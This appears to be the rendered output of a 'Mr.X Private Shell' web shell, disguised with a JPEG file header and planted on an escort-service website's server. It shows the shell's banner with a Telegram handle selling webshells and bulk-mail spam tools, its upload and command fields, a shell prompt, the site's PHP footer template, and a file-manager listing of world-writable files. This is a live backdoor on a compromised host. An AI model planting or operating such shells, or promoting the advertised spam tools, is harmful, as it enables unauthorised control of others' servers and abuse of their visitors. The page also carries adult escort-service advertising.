����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

njujpgyl@216.73.216.242: ~ $
<!-- Footer -->
<footer class="footer">
    <div class="container">
        <div class="row">
            <div class="col-lg-4 col-md-12 mb-4">
                <div class="footer-links">
                    <h5>About DelhiGal.com</h5>
                    <p>delhigal.com is a premium independent escort service provider in
                        <?= htmlspecialchars($area['name'] ?? 'Delhi') ?>,
                        offering trusted and discreet companionship for adults. Our aim is to
                        provide a safe, professional and satisfying experience for our clients.</p>

                    <div class="social-links">
                        <a href="#" class="btn btn-outline-light me-2"><i class="fab fa-facebook"></i></a>
                        <a href="#" class="btn btn-outline-light me-2"><i class="fab fa-twitter"></i></a>
                        <a href="#" class="btn btn-outline-light me-2"><i class="fab fa-instagram"></i></a>
                    </div>
                </div>
            </div>

            <?php
            // Get all parent areas with hierarchical URLs
            $parentAreas = getAllParentAreasWithUrls();

            // Split into 3 columns for main areas
            $areaColumns = array_chunk($parentAreas, ceil(count($parentAreas) / 3));
            ?>

            <?php foreach ($areaColumns as $column): ?>
            <div class="col-lg-2 col-md-6 mb-4">
                <?php foreach ($column as $parentArea): ?>
                <div class="footer-links mb-4">
                    <h5><?= htmlspecialchars($parentArea['name']) ?> Areas</h5>
                    <ul>
                        <li>
                            <a href="<?= $parentArea['hierarchical_url'] ?>">
                                <strong>All <?= htmlspecialchars($parentArea['name']) ?> Escorts</strong>
                            </a>
                        </li>
                        <?php
                                $children = getChildAreasByParentWithUrls($parentArea['slug'], $parentArea);
                                if (!empty($children)):
                                ?>
                        <?php foreach (array_slice($children, 0, 4) as $child): ?>
                        <li>
                            <a href="<?= $child['hierarchical_url'] ?>">
                                <?= htmlspecialchars($child['name']) ?> Escorts
                            </a>
                        </li>
                        <?php endforeach; ?>

                        <?php if (count($children) > 4): ?>
                        <li>
                            <a href="<?= $parentArea['hierarchical_url'] ?>" class="text-warning">
                                +<?= (count($children) - 4) ?> more areas
                            </a>
                        </li>
                        <?php endif; ?>
                        <?php else: ?>
                        <li><a href="<?= $parentArea['hierarchical_url'] ?>">View Escorts</a></li>
                        <?php endif; ?>
                    </ul>
                </div>
                <?php endforeach; ?>
            </div>
            <?php endforeach; ?>

            <!-- Additional Dynamic Column 1 - Popular & Quick Access -->
            <div class="col-lg-2 col-md-6 mb-4">
                <div class="footer-links">
                    <h5>Popular Locations</h5>
                    <ul>
                        <?php
                        // Get context-based popular areas
                        $contextualAreas = getContextualAreas('auto');
                        if (empty($contextualAreas)) {
                            $contextualAreas = getChildAreasByParentWithUrls('delhi', getAreaBySlugSimple('delhi'));
                        }

                        foreach (array_slice($contextualAreas, 0, 6) as $popularArea):
                        ?>
                        <li>
                            <a href="<?= $popularArea['hierarchical_url'] ?>">
                                <i class="fas fa-fire me-2 text-danger small"></i>
                                <?= htmlspecialchars($popularArea['name']) ?>
                            </a>
                        </li>
                        <?php endforeach; ?>
                    </ul>
                </div>
            </div>

            <!-- Additional Dynamic Column 2 - Services & Support -->
            <div class="col-lg-2 col-md-6 mb-4">
                <div class="footer-links">
                    <h5>Our Services</h5>
                    <ul>
                        <li><a href="<?= createurl() ?>#services"><i class="fas fa-venus me-2"></i>Russian Escorts</a>
                        </li>
                        <li><a href="<?= createurl() ?>#services"><i class="fas fa-graduation-cap me-2"></i>College
                                Girls</a></li>
                        <li><a href="<?= createurl() ?>#services"><i class="fas fa-star me-2"></i>Model Escorts</a></li>
                        <li><a href="<?= createurl() ?>#services"><i class="fas fa-crown me-2"></i>VIP Escorts</a></li>
                        <li><a href="<?= createurl() ?>#pricing"><i class="fas fa-tags me-2"></i>Service Packages</a>
                        </li>
                        <li><a href="<?= createurl() ?>#contact"><i class="fas fa-clock me-2"></i>24/7 Booking</a></li>
                    </ul>
                </div>
            </div>
        </div>

        <div class="footer-bottom">
            <p class="text-warning">
                <strong>Disclaimer : </strong> This website contains adult-oriented content
                and is intended strictly for individuals 18 years of age or older. By
                continuing to browse, you confirm that you are of legal age in your
                jurisdiction. If not, please exit immediately.
            </p>
            <p>&copy; 2025 Delhigal.com. All rights reserved.</p>
        </div>
    </div>
</footer>

<!-- Floating Buttons -->
<a href="tel:<?= $area['phone'] ?? '+910000000000' ?>" class="floating-btn phone" title="Call Now">
    <i class="fas fa-phone"></i>
</a>
<a href="https://wa.me/<?= $area['phone'] ?? '910000000000' ?>" target="_blank" class="floating-btn whatsapp"
    title="WhatsApp Now">
    <i class="fab fa-whatsapp"></i>
</a>

Filemanager

Name Type Size Permission Actions
.well-known Folder 0777
cache Folder 0777
content Folder 0777
content1 Folder 0777
image Folder 0777
.ftpquota File 12 B 0666
404.php File 1.31 KB 0666
_ File 3.55 KB 0644
android-chrome-192x192.png File 78.08 KB 0666
android-chrome-512x512.png File 378.8 KB 0666
apple-touch-icon.png File 69.97 KB 0666
arealist.xml File 13.18 KB 0666
auth.php File 884 B 0666
cache.php File 948 B 0666
content_manager.php File 11.84 KB 0666
delhigal.zip File 6.82 MB 0644
error_logs.php File 10.43 KB 0644
frontpage.php File 113.04 KB 0666
functions.php File 21.38 KB 0666
robots.txt File 71 B 0666
template-footer.php File 6.32 KB 0666
template-header.php File 38.08 KB 0666
template.php File 93.07 KB 0666
test.php File 151 B 0666